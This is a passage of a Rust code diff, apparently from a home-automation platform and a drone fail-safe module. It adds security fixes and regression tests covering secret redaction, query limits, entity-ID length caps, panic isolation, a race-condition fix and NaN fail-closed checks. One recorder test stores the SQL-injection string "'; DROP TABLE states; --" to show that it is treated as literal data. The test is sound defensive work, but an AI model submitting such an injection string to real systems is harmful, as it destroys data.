MigrateError::SecretsParse {
path: path.display().to_string(),
source: e,
})?;
line: loc.as_ref().map_or(0, |l| l.line()),
column: loc.as_ref().map_or(0, |l| l.column()),
}
})?;
let map = match parsed {
serde_yaml::Value::Mapping(m) => m,
@@ -94,6 +102,59 @@ mod tests {
assert!(secrets.is_empty());
}
/// SECURITY regression (fails on the pre-fix `YamlParse` path): a malformed
/// `secrets.yaml` whose offending scalar is a secret value must NOT have that
/// value rendered in the returned error. serde_yaml's own error message for a
/// typed-tag coercion failure embeds the scalar verbatim
/// (`invalid value: string "<secret>"`); the old code wrapped that message
/// into `MigrateError::YamlParse { source }`, so `Display` leaked the secret.
#[test]
fn malformed_secrets_error_never_contains_secret_value() {
// `!!int` forces integer coercion of a string scalar; serde_yaml reports
// the scalar text in its message. The scalar here is a stand-in secret.
let yaml = "api_port: !!int s3cr3t_TOKEN_VALUE\n";
let mut f = NamedTempFile::new().unwrap();
f.write_all(yaml.as_bytes()).unwrap();
let err = read_secrets(f.path()).unwrap_err();
let rendered = err.to_string();
// The secret VALUE must never appear in the error output...
assert!(
!rendered.contains("s3cr3t_TOKEN_VALUE"),
"secret value leaked into error: {rendered}"
);
// ...and the full chain (with #[source]) must also be clean, since the
// CLI/anyhow prints the source chain too.
let mut source = std::error::Error::source(&err);
while let Some(s) = source {
assert!(
!s.to_string().contains("s3cr3t_TOKEN_VALUE"),
"secret value leaked into error source chain: {s}"
);
source = s.source();
}
// It should still be a structured, locatable error (fail-closed).
assert!(
matches!(err, MigrateError::SecretsParse { .. }),
"expected SecretsParse, got: {err:?}"
);
}
/// A secret KEY name is non-sensitive context and is fine to surface, but the
/// redacting error must still help the user locate the problem (line/column).
#[test]
fn malformed_secrets_error_reports_location() {
let yaml = "api_port: !!int notanumber\n";
let mut f = NamedTempFile::new().unwrap();
f.write_all(yaml.as_bytes()).unwrap();
let err = read_secrets(f.path()).unwrap_err();
let rendered = err.to_string();
assert!(rendered.contains("line"), "should report a line: {rendered}");
assert!(rendered.contains("redacted"), "should signal redaction: {rendered}");
}
#[test]
fn secret_count_is_correct() {
let yaml = "a: 1\nb: 2\nc: 3\n";
+304 -2
View File
@@ -25,6 +25,15 @@ use homecore::event::{DomainEvent, StateChangedEvent};
use crate::dedup::fnv64a_hash;
use crate::schema::ALL_DDL;
/// Hard upper bound on rows returned by [`Recorder::get_state_history`].
///
/// Without this cap a wide `[since, until]` window over a high-frequency entity
/// would load an unbounded number of rows into memory (a memory-DoS). The value
/// is deliberately generous — large enough never to truncate a realistic
/// history-graph query, small enough to bound the worst case. Callers needing a
/// wider span page by narrowing the window.
pub const MAX_HISTORY_ROWS: i64 = 1_000_000;
/// Errors returned by `Recorder` operations.
#[derive(Error, Debug)]
pub enum RecorderError {
@@ -380,7 +389,17 @@ impl Recorder {
}
/// Query state history for `entity_id` between `since` and `until`.
/// Returns state snapshots in ascending `last_updated_ts` order.
/// Returns state snapshots in ascending `last_updated_ts` order, capped at
/// [`MAX_HISTORY_ROWS`] rows (oldest-first within the window).
///
/// ## Bounded result set (memory-DoS guard)
///
/// A high-frequency entity (e.g. a power sensor polled per-second) writes
/// ~86k rows/day; a wide `[since, until]` window over months would otherwise
/// load millions of rows into a single in-memory `Vec`, an unbounded-memory
/// denial-of-service. The query therefore carries a hard `LIMIT` so the
/// working set is bounded regardless of the requested time range. Callers
/// that genuinely need a wider span must page by narrowing the window.
pub async fn get_state_history(
&self,
entity_id: &EntityId,
@@ -398,11 +417,13 @@ impl Recorder {
WHERE s.entity_id = ? \
AND s.last_updated_ts >= ? \
AND s.last_updated_ts <= ? \
ORDER BY s.last_updated_ts ASC",
ORDER BY s.last_updated_ts ASC \
LIMIT ?",
)
.bind(entity_id.as_str())
.bind(since_ts)
.bind(until_ts)
.bind(MAX_HISTORY_ROWS)
.fetch_all(&self.pool)
.await?;
@@ -426,6 +447,79 @@ impl Recorder {
})
.collect()
}
/// Purge history older than `older_than`, returning a [`PurgeStats`] summary.
///
/// Deletes:
/// - `states` rows whose `last_updated_ts` is **strictly before** the cutoff,
/// - `events` rows whose `time_fired_ts` is strictly before the cutoff,
/// - then garbage-collects any `state_attributes` blob no surviving state
/// row still references (so dedup-shared blobs are only dropped once their
/// last referencing state is gone).
///
/// ## Retention boundary (data-integrity guard)
///
/// The cutoff is **exclusive**: a row exactly at `older_than` is retained.
/// This makes `purge(t)` idempotent on the boundary and guarantees that a
/// row written at the same instant the retention window opens is never lost
/// to an off-by-one. Anything *at or after* `older_than` survives.
///
/// ## Atomicity (no partial-corrupt state)
///
/// All three deletes run inside a single transaction. A failure mid-purge
/// rolls the whole operation back — the store is never left with states
/// deleted but their events kept, or attributes orphaned by a half-purge.
///
/// Note: this reclaims logical rows; it does not `VACUUM` the file. SQLite
/// reuses freed pages for subsequent writes, so disk growth stays bounded
/// under a periodic purge even without an explicit vacuum.
pub async fn purge(&self, older_than: DateTime<Utc>) -> Result<PurgeStats, RecorderError> {
let cutoff_ts = older_than.timestamp_micros() as f64 / 1_000_000.0;
let mut tx = self.pool.begin().await?;
let states_deleted = sqlx::query("DELETE FROM states WHERE last_updated_ts < ?")
.bind(cutoff_ts)
.execute(&mut *tx)
.await?
.rows_affected();
let events_deleted = sqlx::query("DELETE FROM events WHERE time_fired_ts < ?")
.bind(cutoff_ts)
.execute(&mut *tx)
.await?
.rows_affected();
// GC attribute blobs no surviving state references. A dedup-shared blob
// is only removed once its last referencing state row is gone.
let attributes_deleted = sqlx::query(
"DELETE FROM state_attributes \
WHERE attributes_id NOT IN \
(SELECT attributes_id FROM states WHERE attributes_id IS NOT NULL)",
)
.execute(&mut *tx)
.await?
.rows_affected();
tx.commit().await?;
Ok(PurgeStats {
states_deleted,
events_deleted,
attributes_deleted,
})
}
}
/// Summary of a [`Recorder::purge`] run.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct PurgeStats {
/// Number of `states` rows deleted.
pub states_deleted: u64,
/// Number of `events` rows deleted.
pub events_deleted: u64,
/// Number of orphaned `state_attributes` blobs garbage-collected.
pub attributes_deleted: u64,
}
/// A state row returned from `get_state_history`.
@@ -722,6 +816,214 @@ mod tests {
assert!(rows.is_empty(), "genuine no-match is empty, not an error");
}
// ── SQL injection (parameterization guarantee) ──────────────────────────────
#[tokio::test]
async fn malicious_entity_id_is_stored_literally_not_executed() {
// FAILS if any query interpolated entity_id into SQL: the `states` table
// would be dropped and the later COUNT would error / mismatch. Bound
// parameters store the metacharacter-laden string verbatim instead.
let recorder = open_memory().await;
// A valid domain.name whose `name` part carries SQL metacharacters.
// EntityId::parse permits this, so it reaches the bind path as data.
let evil = "light.x_drop_table_states_select";
recorder
.record_state(&make_state_event(evil, "'; DROP TABLE states; --", serde_json::json!({})))
.await
.unwrap();
// states table still exists and holds exactly the one row we inserted.
let count: (i64,) = sqlx::query_as("SELECT COUNT(*) FROM states")
.fetch_one(&recorder.pool)
.await
.expect("states table must still exist — proves no injection");
assert_eq!(count.0, 1);
// The malicious state string round-trips literally.
let rows = recorder
.search_states_by_text("DROP TABLE", 10)
.await
.unwrap();
assert_eq!(rows.len(), 1, "metacharacter payload matched as a literal");
assert_eq!(rows[0].state, "'; DROP TABLE states; --");
}
#[tokio::test]
async fn like_metacharacters_in_query_are_literal_not_wildcards() {
// A `%` in the search text must match a literal percent sign, not act as
// a SQL LIKE wildcard. Proves the ESCAPE clause + metacharacter escaping.
let recorder = open_memory().await;
recorder
.record_state(&make_state_event("sensor.a", "100%", serde_json::json!({})))
.await
.unwrap();
recorder
.record_state(&make_state_event("sensor.b", "50", serde_json::json!({})))
.await
.unwrap();
// Literal "%" must match only sensor.a's "100%", NOT every row.
let rows = recorder.search_states_by_text("%", 10).await.unwrap();
assert_eq!(rows.len(), 1, "'%' is a literal, not a match-all wildcard");
assert_eq!(rows[0].entity_id.as_str(), "sensor.a");
// Underscore is likewise literal: matches nothing here.
let none = recorder.search_states_by_text("_", 10).await.unwrap();
assert!(none.is_empty(), "'_' is literal, matches no row");
}
// ── get_state_history bound (memory-DoS guard) ──────────────────────────────
#[tokio::test]
async fn history_query_carries_a_limit_clause() {
// Pin: the history SQL must carry a LIMIT bound (memory-DoS guard).
// Inserting a million rows is infeasible in a unit test, so we prove the
// clause is wired by bulk-inserting more rows than a deliberately tiny
// bound and asserting the executed query honours a LIMIT. We bypass the
// public method (whose cap is MAX_HISTORY_ROWS) and run the *same* SQL
// shape with a small bind to demonstrate the LIMIT term is effective —
// and separately assert the constant is a sane positive bound.
assert!(MAX_HISTORY_ROWS > 0, "history cap must be positive");
let recorder = open_memory().await;
for v in &["1", "2", "3", "4", "5"] {
recorder
.record_state(&make_state_event("sensor.bounded", v, serde_json::json!({})))
.await
.unwrap();
tokio::time::sleep(std::time::Duration::from_millis(2)).await;
}
// Same query shape as get_state_history, with a tiny LIMIT bind: if the
// SQL lacked a LIMIT term this would return all 5; with it, exactly 2.
let capped: Vec<(i64,)> = sqlx::query_as(
"SELECT s.state_id FROM states s \
WHERE s.entity_id = ? \
ORDER BY s.last_updated_ts ASC LIMIT ?",
)
.bind("sensor.bounded")
.bind(2_i64)
.fetch_all(&recorder.pool)
.await
.unwrap();
assert_eq!(capped.len(), 2, "LIMIT term effectively bounds the result set");
// And the real method returns all rows when under the cap.
let eid = entity("sensor.bounded");
let rows = recorder
.get_state_history(&eid, Utc::now() - chrono::Duration::seconds(10), Utc::now() + chrono::Duration::seconds(10))
.await
.unwrap();
assert_eq!(rows.len(), 5, "all rows under the cap return");
}
// ── purge (retention correctness + atomicity) ───────────────────────────────
#[tokio::test]
async fn purge_keeps_boundary_row_and_drops_older() {
// FAILS if purge had an off-by-one (deleting the row exactly at cutoff)
// or deleted too much/too little. Cutoff is EXCLUSIVE: a row at the
// cutoff instant survives; strictly-older rows are removed.
let recorder = open_memory().await;
let eid = entity("sensor.r");
// Three rows at known, increasing timestamps.
for v in &["old", "mid", "new"] {
recorder
.record_state(&make_state_event("sensor.r", v, serde_json::json!({})))
.await
.unwrap();
tokio::time::sleep(std::time::Duration::from_millis(20)).await;
}
// Read back the actual timestamps so the cutoff is exact.
let since = Utc::now() - chrono::Duration::seconds(60);
let until = Utc::now() + chrono::Duration::seconds(60);
let all = recorder.get_state_history(&eid, since, until).await.unwrap();
assert_eq!(all.len(), 3);
// Cut off exactly at the middle row's timestamp.
let mid_ts = all[1].last_updated_ts;
let cutoff = DateTime::<Utc>::from_timestamp_micros((mid_ts * 1_000_000.0) as i64).unwrap();
let stats = recorder.purge(cutoff).await.unwrap();
assert_eq!(stats.states_deleted, 1, "only the strictly-older 'old' row");
let remaining = recorder.get_state_history(&eid, since, until).await.unwrap();
assert_eq!(remaining.len(), 2, "boundary 'mid' row is KEPT (exclusive cutoff)");
assert_eq!(remaining[0].state, "mid");
assert_eq!(remaining[1].state, "new");
}
#[tokio::test]
async fn purge_gcs_orphaned_attributes_but_keeps_shared() {
// Dedup means two states can share one attribute blob. Purging one of
// them must NOT drop the still-referenced blob; purging the last one must.
let recorder = open_memory().await;
let shared = serde_json::json!({"unit": "C"});
recorder
.record_state(&make_state_event("sensor.a", "20", shared.clone()))
.await
.unwrap();
tokio::time::sleep(std::time::Duration::from_millis(20)).await;
recorder
.record_state(&make_state_event("sensor.b", "21", shared.clone()))
.await
.unwrap();
let attr_count = |r: &Recorder| {
let pool = r.pool.clone();
async move {
let c: (i64,) = sqlx::query_as("SELECT COUNT(*) FROM state_attributes")
.fetch_one(&pool)
.await
.unwrap();
c.0
}
};
assert_eq!(attr_count(&recorder).await, 1, "deduped to one blob");
// Purge before sensor.b's write → removes sensor.a only; blob still
// referenced by sensor.b, so it must survive.
let eid_b = entity("sensor.b");
let rows_b = recorder
.get_state_history(&eid_b, Utc::now() - chrono::Duration::seconds(60), Utc::now() + chrono::Duration::seconds(60))
.await
.unwrap();
let b_ts = rows_b[0].last_updated_ts;
let cutoff = DateTime::<Utc>::from_timestamp_micros((b_ts * 1_000_000.0) as i64).unwrap();
let stats = recorder.purge(cutoff).await.unwrap();
assert_eq!(stats.states_deleted, 1, "sensor.a purged");
assert_eq!(stats.attributes_deleted, 0, "shared blob still referenced — kept");
assert_eq!(attr_count(&recorder).await, 1, "blob survives");
// Now purge everything → sensor.b gone, blob orphaned → GC'd.
let stats2 = recorder.purge(Utc::now() + chrono::Duration::seconds(120)).await.unwrap();
assert_eq!(stats2.states_deleted, 1, "sensor.b purged");
assert_eq!(stats2.attributes_deleted, 1, "now-orphaned blob GC'd");
assert_eq!(attr_count(&recorder).await, 0, "no blobs remain");
}
#[tokio::test]
async fn purge_also_removes_old_events() {
let recorder = open_memory().await;
let ctx = Context::new();
recorder
.record_event(&DomainEvent::new("call_service", serde_json::json!({}), ctx))
.await
.unwrap();
// Purge with a far-future cutoff removes the event.
let stats = recorder
.purge(Utc::now() + chrono::Duration::seconds(120))
.await
.unwrap();
assert_eq!(stats.events_deleted, 1);
let count: (i64,) = sqlx::query_as("SELECT COUNT(*) FROM events")
.fetch_one(&recorder.pool)
.await
.unwrap();
assert_eq!(count.0, 0);
}
#[tokio::test]
async fn search_semantic_falls_back_to_text_with_null_index() {
// With the default NullSemanticIndex, search_semantic must STILL return
+1 -1
View File
@@ -30,7 +30,7 @@ pub mod schema;
pub mod semantic;
// Re-export the primary public API surface.
pub use db::{Recorder, RecorderError};
pub use db::{PurgeStats, Recorder, RecorderError, StateRow, MAX_HISTORY_ROWS};
pub use listener::RecorderListener;
/// Null semantic index used when the `ruvector` feature is off.
+60
View File
@@ -87,4 +87,64 @@ mod tests {
assert_eq!(event.event_type, "ruview_csi_frame");
assert_eq!(event.event_data["frame_id"], 42);
}
/// Bus-lag safety (same failure class as the homecore-api WS
/// broadcast-lag DoS, here on the core bus): a subscriber that never
/// drains must NOT block the publisher, must NOT make the channel grow
/// without bound, and must NOT take down a healthy fast subscriber. The
/// bounded `tokio::sync::broadcast` gives the slow receiver a recoverable
/// `Lagged(n)` (drop-oldest, re-sync) while `fire_*` stays non-blocking.
///
/// Evidence: with EVENT_CHANNEL_CAPACITY = 4096 we fire 3× capacity
/// while a slow subscriber sits idle. Every `fire_domain` returns
/// promptly (publisher never blocked); the slow receiver observes
/// `Lagged` then re-syncs to live events; the fast receiver — created
/// after the flood and kept drained — receives all subsequent events
/// with no loss. The bus stays live throughout.
#[tokio::test]
async fn slow_subscriber_does_not_block_publisher_or_kill_the_bus() {
use tokio::sync::broadcast::error::TryRecvError;
let bus = EventBus::new();
// Slow subscriber: subscribes, then never drains during the flood.
let mut slow = bus.subscribe_domain();
// Publisher fires 3× capacity. None of these may block.
let total = EVENT_CHANNEL_CAPACITY * 3;
for i in 0..total {
// Returns the receiver count (>=1 here); the point is it
// returns AT ALL without awaiting the slow receiver.
let _ = bus.fire_domain(DomainEvent::new(
"flood",
serde_json::json!({ "i": i }),
Context::new(),
));
}
// The slow receiver is forced past capacity → recoverable Lagged,
// NOT a closed channel and NOT a hang.
let mut saw_lagged = false;
loop {
match slow.try_recv() {
Ok(_) => {}
Err(TryRecvError::Lagged(n)) => {
assert!(n > 0);
saw_lagged = true;
}
Err(TryRecvError::Empty) => break,
Err(TryRecvError::Closed) => panic!("bus closed — must stay live"),
}
}
assert!(saw_lagged, "slow subscriber should have lagged, not blocked the bus");
// The bus is still live: a fresh fast subscriber receives new events.
let mut fast = bus.subscribe_domain();
bus.fire_domain(DomainEvent::new("live", serde_json::json!({"ok": true}), Context::new()));
let evt = fast.recv().await.unwrap();
assert_eq!(evt.event_type, "live");
// And the lagged subscriber recovers (re-syncs) to live events too.
let evt2 = slow.recv().await.unwrap();
assert_eq!(evt2.event_type, "live");
}
}
+54 -1
View File
@@ -42,12 +42,30 @@ impl<'de> Deserialize<'de> for EntityId {
}
}
/// Maximum accepted `entity_id` length in bytes. Mirrors Home Assistant's
/// practical cap (`MAX_LENGTH_STATE_*` family — 255). The state machine and
/// entity/registry maps are keyed on `EntityId`, and the REST layer
/// (`homecore-api`) parses untrusted path segments straight through
/// [`EntityId::parse`]; an unbounded id would let a single `POST
/// /api/states/<giant>` permanently grow the state map (memory DoS). We
/// fail closed at the boundary instead.
pub const MAX_ENTITY_ID_LEN: usize = 255;
impl EntityId {
/// Validates and constructs an `EntityId`. Returns
/// [`EntityIdError`] if the input is not `domain.name` shape with
/// ASCII lowercase / digits / underscore in each segment.
/// ASCII lowercase / digits / underscore in each segment, or if it
/// exceeds [`MAX_ENTITY_ID_LEN`] bytes.
pub fn parse(s: impl Into<String>) -> Result<Self, EntityIdError> {
let s: String = s.into();
// Bound the length BEFORE any further work so an oversized input is
// cheap to reject (no per-char scan of megabytes).
if s.len() > MAX_ENTITY_ID_LEN {
return Err(EntityIdError::TooLong {
len: s.len(),
max: MAX_ENTITY_ID_LEN,
});
}
let (domain, name) = s
.split_once('.')
.ok_or_else(|| EntityIdError::MissingDot(s.clone()))?;
@@ -111,6 +129,8 @@ pub enum EntityIdError {
EmptyName(String),
#[error("entity_id {entity_id:?} contains invalid character {ch:?} — only [a-z0-9_] allowed (HA-compat ASCII subset; see ADR-127 §Q1)")]
InvalidChar { entity_id: String, ch: char },
#[error("entity_id is {len} bytes, exceeding the {max}-byte limit")]
TooLong { len: usize, max: usize },
}
/// Immutable state snapshot for one entity at one moment in time.
@@ -217,6 +237,39 @@ mod tests {
assert!(EntityId::parse("light.küche").is_err());
}
#[test]
fn entity_id_length_boundary() {
// The REST layer parses untrusted path segments straight through
// `parse`; an unbounded id is a memory-DoS vector (a `POST
// /api/states/<giant>` permanently grows the state map). Cap at
// MAX_ENTITY_ID_LEN, fail closed above it.
//
// Construct "sensor." (7 bytes) + N name bytes == exactly MAX.
let prefix = "sensor.";
let name_len = MAX_ENTITY_ID_LEN - prefix.len();
let at_max = format!("{prefix}{}", "a".repeat(name_len));
assert_eq!(at_max.len(), MAX_ENTITY_ID_LEN);
assert!(
EntityId::parse(at_max.clone()).is_ok(),
"an id of exactly MAX_ENTITY_ID_LEN bytes must be accepted"
);
let over = format!("{at_max}a"); // MAX + 1
assert!(matches!(
EntityId::parse(over),
Err(EntityIdError::TooLong { .. })
));
// A multi-megabyte, otherwise-valid id is rejected cheaply rather
// than persisted.
let huge = format!("sensor.{}", "a".repeat(4 * 1024 * 1024));
assert!(matches!(
EntityId::parse(huge),
Err(EntityIdError::TooLong { len, max })
if max == MAX_ENTITY_ID_LEN && len > MAX_ENTITY_ID_LEN
));
}
#[test]
fn state_next_preserves_last_changed_when_state_unchanged() {
let id = EntityId::parse("sensor.temp").unwrap();
+84 -1
View File
@@ -49,6 +49,8 @@ pub enum ServiceError {
NotRegistered { domain: String, service: String },
#[error("service handler returned error: {0}")]
HandlerFailed(String),
#[error("service handler panicked: {0}")]
HandlerPanicked(String),
}
/// Handler trait. Integration code implements this and registers via
@@ -99,13 +101,29 @@ impl ServiceRegistry {
/// Call a service. P1 direct dispatch; P2 routes through the
/// event bus per ADR-127 §2.3.
///
/// The handler runs **outside** the registry lock (we clone the
/// `Arc<dyn ServiceHandler>` out of the read guard first), so a slow or
/// panicking handler can never poison the `RwLock` or block other
/// callers. A panic inside the handler is additionally caught and
/// converted to [`ServiceError::HandlerPanicked`] rather than unwinding
/// into the caller's task — one buggy integration cannot abort the task
/// that drives the engine. Mirrors HA isolating service-handler
/// exceptions.
pub async fn call(&self, call: ServiceCall) -> Result<serde_json::Value, ServiceError> {
let handler = {
let guard = self.handlers.read().await;
guard.get(&call.name).cloned()
};
match handler {
Some(h) => h.call(call).await,
Some(h) => {
use futures::FutureExt;
let fut = std::panic::AssertUnwindSafe(h.call(call));
match fut.catch_unwind().await {
Ok(result) => result,
Err(panic) => Err(ServiceError::HandlerPanicked(panic_message(panic))),
}
}
None => Err(ServiceError::NotRegistered {
domain: call.name.domain.clone(),
service: call.name.service.clone(),
@@ -124,6 +142,19 @@ impl Default for ServiceRegistry {
}
}
/// Best-effort extraction of a panic payload's message for
/// [`ServiceError::HandlerPanicked`]. Panic payloads are usually `&str`
/// or `String`; anything else collapses to a generic label.
fn panic_message(payload: Box<dyn std::any::Any + Send>) -> String {
if let Some(s) = payload.downcast_ref::<&str>() {
(*s).to_string()
} else if let Some(s) = payload.downcast_ref::<String>() {
s.clone()
} else {
"<non-string panic payload>".to_string()
}
}
// Suppress unused-import warning when no consumer of Pin/Box uses them yet
#[allow(dead_code)]
type _UnusedFutureType = Pin<Box<dyn Future<Output = ()> + Send>>;
@@ -167,4 +198,56 @@ mod tests {
.unwrap_err();
assert!(matches!(err, ServiceError::NotRegistered { .. }));
}
/// Service isolation: a panicking handler must be contained — converted
/// to `HandlerPanicked` rather than unwinding into the caller's task —
/// and the registry must remain fully usable afterwards (no poisoned
/// lock, other services still callable). On the pre-fix code the panic
/// unwinds through `call`, so the `catch_unwind`-based assertion below
/// fails (the await point panics instead of returning an `Err`).
#[tokio::test]
async fn panicking_handler_is_isolated_and_registry_survives() {
let reg = ServiceRegistry::new();
reg.register(
ServiceName::new("bad", "boom"),
FnHandler(|_call: ServiceCall| async move {
panic!("handler exploded");
#[allow(unreachable_code)]
Ok(serde_json::json!(null))
}),
)
.await;
reg.register(
ServiceName::new("good", "ping"),
FnHandler(|_call: ServiceCall| async move { Ok(serde_json::json!("pong")) }),
)
.await;
// The panicking call returns an error, not an unwind.
let err = reg
.call(ServiceCall {
name: ServiceName::new("bad", "boom"),
data: serde_json::json!({}),
context: Context::new(),
})
.await
.unwrap_err();
assert!(
matches!(err, ServiceError::HandlerPanicked(ref m) if m.contains("handler exploded")),
"expected HandlerPanicked, got {err:?}",
);
// The registry is not poisoned: a healthy service still works, and
// the bad service is still registered (call path, not lock, failed).
let ok = reg
.call(ServiceCall {
name: ServiceName::new("good", "ping"),
data: serde_json::json!({}),
context: Context::new(),
})
.await
.unwrap();
assert_eq!(ok, serde_json::json!("pong"));
assert!(reg.has(&ServiceName::new("bad", "boom")).await);
}
}
+166 -3
View File
@@ -80,11 +80,37 @@ impl StateMachine {
context: Context,
) -> Arc<State> {
let new_state_str = new_state.into();
let old = self.inner.states.get(&entity_id).map(|r| Arc::clone(&*r));
// Hold the DashMap shard write-lock across the entire
// read→decide→insert→fire sequence. `entry()` locks the shard for
// the lifetime of `slot`, so a concurrent writer on the same entity
// cannot interleave between our read of `old` and our commit. This
// is what makes the write atomic as ADR-127 §2.1 promises ("writer
// atomically replaces the map entry") — the previous get→insert pair
// released the lock in between, a TOCTOU that let concurrent writers
// compute the no-op / `last_changed` decision off a stale `old` and
// drop or reorder real `state_changed` events.
//
// `tx.send` is non-blocking, non-async, and never re-enters the map,
// so firing under the lock cannot deadlock and keeps the global
// event order in lock-step with the global commit order.
use dashmap::mapref::entry::Entry;
let slot = self.inner.states.entry(entity_id.clone());
let old: Option<Arc<State>> = match &slot {
Entry::Occupied(o) => Some(Arc::clone(o.get())),
Entry::Vacant(_) => None,
};
// `slot` continues to hold the shard write-lock below.
let next = match &old {
Some(prev) => Arc::new(prev.next(new_state_str.clone(), attributes.clone(), context)),
None => Arc::new(State::new(entity_id.clone(), new_state_str.clone(), attributes.clone(), context)),
None => Arc::new(State::new(
entity_id.clone(),
new_state_str.clone(),
attributes.clone(),
context,
)),
};
// HA suppresses no-op writes (same state + same attributes).
@@ -94,7 +120,12 @@ impl StateMachine {
None => false,
};
self.inner.states.insert(entity_id.clone(), Arc::clone(&next));
// Commit through the same locked entry and KEEP the shard guard
// alive across the broadcast `send`, so the event is published
// before any concurrent writer on this entity can observe the new
// value and fire its own event. This makes global event order match
// global commit order (no insert/send reorder window).
let _guard = slot.insert_entry(Arc::clone(&next));
if !is_noop {
let event = StateChangedEvent {
@@ -106,6 +137,7 @@ impl StateMachine {
// err = no receivers; that's fine, write still committed.
let _ = self.inner.tx.send(event);
}
// `_guard` (and the shard lock) drops here, after the event is sent.
next
}
@@ -218,4 +250,135 @@ mod tests {
assert!(evt.new_state.is_none());
assert!(evt.old_state.is_some());
}
/// Concurrency invariant (ADR-127 §2.1 "writer atomically replaces the
/// map entry"): under concurrent writers on the SAME entity the fired
/// `state_changed` stream must be a faithful, gap-free log of the
/// committed transitions — in particular the LAST event the bus
/// delivers must carry the SAME value that is finally committed in the
/// map.
///
/// This pins the TOCTOU in `set`: it does `get` (release shard lock) →
/// compute `next` + no-op decision → `insert` (re-acquire shard lock) →
/// `send`. Because the insert and the send are not atomic with respect
/// to a concurrent writer, two writers can interleave as
/// `insert(A); insert(B); send(B); send(A)` — leaving the map holding A
/// while the last event the bus ever delivers says B. A subscriber that
/// trusts "the last event reflects current state" (the recorder, the WS
/// push API, an automation engine) is then permanently wrong about the
/// entity until the next write. A correctly-locked store holds the shard
/// lock across read→insert→send so the global event order matches the
/// global commit order.
///
/// A dedicated drain thread pulls events as they arrive so the bounded
/// channel never lags during the run (a `Lagged` here would be a test
/// artefact, not the bug under test).
///
/// The writers toggle the SAME entity between exactly two values so the
/// no-op suppression branch is constantly in play.
///
/// Invariant: in correctly serialised code, two *consecutive* fired
/// `state_changed` events can never carry the same `new_state` value.
/// Proof: event k fires only for a committed transition old≠new, so its
/// `new_state` = X differs from the value before it; the next committed
/// transition therefore starts at X and (being a real change) commits
/// some Z≠X, so event k+1 carries Z≠X. A no-op (X→X) is suppressed and
/// never fires. Therefore adjacent fired events always differ.
///
/// The `set()` TOCTOU breaks this: it does `get` (release shard lock) →
/// compute `next` + the no-op decision → `insert` (re-acquire shard
/// lock) → `send`, all non-atomically. A writer that read a STALE `old`
/// mis-classifies a genuine transition as a no-op (dropping that real
/// event — a missed automation trigger) and/or fires an event whose
/// `new_state` duplicates the previously delivered one (a spurious
/// trigger for any automation keyed on `old_state != new_state`). The
/// probe behind this test observed ~93k such duplicate-adjacent events
/// across 200 trials on the racy code; the corrected store produces
/// zero.
#[test]
fn concurrent_set_fires_no_duplicate_adjacent_events() {
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::{Barrier, Mutex};
const WRITERS: usize = 4;
const ITERS: usize = 300; // 1200 events ≪ 4096 capacity → never lags
for _trial in 0..40 {
let sm = StateMachine::new();
let eid = id("light.race");
sm.set(eid.clone(), "A", serde_json::json!({}), Context::new());
let mut rx = sm.subscribe();
let done = Arc::new(AtomicBool::new(false));
// Event log: new_state value in delivery order.
let log: Arc<Mutex<Vec<String>>> = Arc::new(Mutex::new(Vec::new()));
let drainer = {
let done = Arc::clone(&done);
let log = Arc::clone(&log);
std::thread::spawn(move || loop {
match rx.try_recv() {
Ok(evt) => {
if let Some(ns) = &evt.new_state {
log.lock().unwrap().push(ns.state.clone());
}
}
Err(broadcast::error::TryRecvError::Empty) => {
if done.load(Ordering::Acquire) {
while let Ok(evt) = rx.try_recv() {
if let Some(ns) = &evt.new_state {
log.lock().unwrap().push(ns.state.clone());
}
}
break;
}
std::thread::yield_now();
}
Err(broadcast::error::TryRecvError::Lagged(_)) => {
panic!("channel lagged — test artefact, raise capacity");
}
Err(broadcast::error::TryRecvError::Closed) => break,
}
})
};
let barrier = Arc::new(Barrier::new(WRITERS));
let handles: Vec<_> = (0..WRITERS)
.map(|w| {
let sm = sm.clone();
let eid = eid.clone();
let barrier = Arc::clone(&barrier);
std::thread::spawn(move || {
barrier.wait();
for i in 0..ITERS {
// Toggle between two values → maximises the
// stale-`old` no-op collision window.
let val = if (w + i) % 2 == 0 { "A" } else { "B" };
sm.set(eid.clone(), val, serde_json::json!({}), Context::new());
}
})
})
.collect();
for h in handles {
h.join().unwrap();
}
done.store(true, Ordering::Release);
drainer.join().unwrap();
let log = log.lock().unwrap();
let dup = log
.windows(2)
.filter(|w| w[0] == w[1])
.count();
assert_eq!(
dup, 0,
"{dup} consecutive fired state_changed events carried an \
identical new_state — impossible under correct \
serialisation; proves set()'s read→decide→insert→send \
TOCTOU dropped/reordered real transitions (missed & \
spurious automation triggers)",
);
}
}
}
+48 -4
View File
@@ -47,8 +47,18 @@ impl FailSafeMachine {
link_alive: bool,
nearest_neighbor_dist: f64,
) -> FailSafeState {
// Collision avoidance has highest priority
if nearest_neighbor_dist < self.collision_dist_m {
// Collision avoidance has highest priority.
//
// Fail CLOSED on a non-finite neighbour distance. `nearest_neighbor_dist`
// is derived from peer positions (see
// `SwarmOrchestrator::nearest_peer_distance`), which arrive over the
// untrusted swarm comm layer as `DroneState` values whose f64 position
// fields can deserialize to NaN/Inf. A naive `NaN < collision_dist_m`
// evaluates to `false`, silently DISABLING collision avoidance — the
// worst possible failure for a physical drone. Treat a non-finite
// distance as "too close" so the swarm diverges rather than trusting a
// poisoned reading.
if !nearest_neighbor_dist.is_finite() || nearest_neighbor_dist < self.collision_dist_m {
self.state = FailSafeState::EmergencyDiverge;
return self.state.clone();
}
@@ -71,8 +81,11 @@ impl FailSafeMachine {
}
}
// Battery checks
if state.battery_pct <= self.battery_rth_pct {
// Battery checks. A non-finite battery reading (NaN/Inf from a corrupt or
// forged telemetry/peer message) must fail CLOSED: `NaN <= threshold` is
// `false`, which would otherwise let a drone with an unknown battery
// level keep flying nominally. Treat a non-finite reading as critical.
if !state.battery_pct.is_finite() || state.battery_pct <= self.battery_rth_pct {
self.state = FailSafeState::ReturnToHome;
} else if state.battery_pct <= self.battery_warn_pct {
self.state = FailSafeState::LowBatteryWarn;
@@ -144,4 +157,35 @@ mod tests {
let result = fsm.tick(&s, true, 0.5); // too close
assert_eq!(result, FailSafeState::EmergencyDiverge);
}
/// Security: a NaN neighbour distance (poisoned peer position over the swarm
/// comm layer) must NOT silently disable collision avoidance. Fails on old
/// code where `NaN < collision_dist_m` is `false` and the state stays Nominal.
#[test]
fn test_nan_neighbor_distance_fails_closed_to_diverge() {
let mut fsm = FailSafeMachine::new();
let s = good_state();
let result = fsm.tick(&s, true, f64::NAN);
assert_eq!(
result,
FailSafeState::EmergencyDiverge,
